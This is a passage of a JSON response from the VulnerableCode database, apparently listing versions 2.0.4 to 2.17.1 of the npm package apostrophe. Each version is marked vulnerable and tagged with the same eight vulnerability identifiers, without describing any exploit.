vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/268480?format=json","purl":"pkg:npm/apostrophe@2.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268481?format=json","purl":"pkg:npm/apostrophe@2.1.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.1.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268482?format=json","purl":"pkg:npm/apostrophe@2.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268483?format=json","purl":"pkg:npm/apostrophe@2.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.1.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268484?format=json","purl":"pkg:npm/apostrophe@2.1.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/268485?format=json","purl":"pkg:npm/apostrophe@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.1.5"},{"url":"http://public2.vulnerablecode.io/api/packages/268486?format=json","purl":"pkg:npm/apostrophe@2.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268487?format=json","purl":"pkg:npm/apostrophe@2.2.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.2.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268488?format=json","purl":"pkg:npm/apostrophe@2.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268489?format=json","purl":"pkg:npm/apostrophe@2.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268490?format=json","purl":"pkg:npm/apostrophe@2.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268491?format=json","purl":"pkg:npm/apostrophe@2.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.3.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268492?format=json","purl":"pkg:npm/apostrophe@2.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268493?format=json","purl":"pkg:npm/apostrophe@2.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268494?format=json","purl":"pkg:npm/apostrophe@2.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268495?format=json","purl":"pkg:npm/apostrophe@2.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.5.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268496?format=json","purl":"pkg:npm/apostrophe@2.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.6.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268497?format=json","purl":"pkg:npm/apostrophe@2.6.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.6.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268498?format=json","purl":"pkg:npm/apostrophe@2.6.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.6.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268499?format=json","purl":"pkg:npm/apostrophe@2.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.7.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268500?format=json","purl":"pkg:npm/apostrophe@2.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268501?format=json","purl":"pkg:npm/apostrophe@2.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268502?format=json","purl":"pkg:npm/apostrophe@2.9.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.9.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268503?format=json","purl":"pkg:npm/apostrophe@2.9.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.9.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268504?format=json","purl":"pkg:npm/apostrophe@2.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268505?format=json","purl":"pkg:npm/apostrophe@2.10.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.10.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268506?format=json","purl":"pkg:npm/apostrophe@2.10.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.10.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268507?format=json","purl":"pkg:npm/apostrophe@2.10.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.10.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268508?format=json","purl":"pkg:npm/apostrophe@2.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268509?format=json","purl":"pkg:npm/apostrophe@2.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.12.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268510?format=json","purl":"pkg:npm/apostrophe@2.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.13.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268511?format=json","purl":"pkg:npm/apostrophe@2.13.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.13.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268512?format=json","purl":"pkg:npm/apostrophe@2.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.13.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268513?format=json","purl":"pkg:npm/apostrophe@2.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.14.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268514?format=json","purl":"pkg:npm/apostrophe@2.14.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.14.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268515?format=json","purl":"pkg:npm/apostrophe@2.14.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.14.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268516?format=json","purl":"pkg:npm/apostrophe@2.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.15.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268517?format=json","purl":"pkg:npm/apostrophe@2.15.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.15.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268518?format=json","purl":"pkg:npm/apostrophe@2.15.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.15.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268519?format=json","purl":"pkg:npm/apostrophe@2.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.16.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268520?format=json","purl":"pkg:npm/apostrophe@2.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.16.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268521?format=json","purl":"pkg:npm/apostrophe@2.17.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.17.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268522?format=json","purl":"pkg:npm/apostrophe@2.17.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vu